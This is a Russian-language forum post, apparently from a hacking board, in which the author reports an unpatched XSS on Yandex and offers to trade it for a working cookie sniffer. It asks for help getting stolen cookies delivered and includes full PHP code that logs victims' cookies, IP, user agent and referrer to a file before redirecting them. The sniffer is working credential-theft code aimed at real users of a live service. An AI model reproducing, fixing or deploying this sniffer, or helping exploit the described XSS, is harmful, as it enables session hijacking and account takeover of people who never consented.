нашел полуактивную xss на яндекс. Пытаюсь подставить сниффер, не получается, вернее при запросе (document.cookie) все кукисы выдаются, а при замене запроса на сниффер, кукисы на сниффер не приходят. Готов поделиться xss с тем, кто подскажет работающий сниффер для яндекса (поделюсь xss после проверки снифа), использовал стандартный от Kaniq и этот сниф, но кукисы не пришли PHP: <?PHP $Cookies = UrlDecode(getenv("QUERY_STRING")); $Date = date("d-m-y H:i:s", time()); $browser = getenv("HTTP_USER_AGENT"); $ref = getenv("HTTP_REFERER"); $ip = getenv("REMOTE_ADDR"); $text = " $Cookies: $Date: $browser: $ref: $ip: $query"; $filelog = fopen("base.php","a+"); fwrite($filelog,"\n $text \n"); fclose($filelog); header('Location: http://somesite.ru'); ?> На майле сниффер работает, на яндексе не работает. Подсказка сниффера тут, помощь в реализации в аську.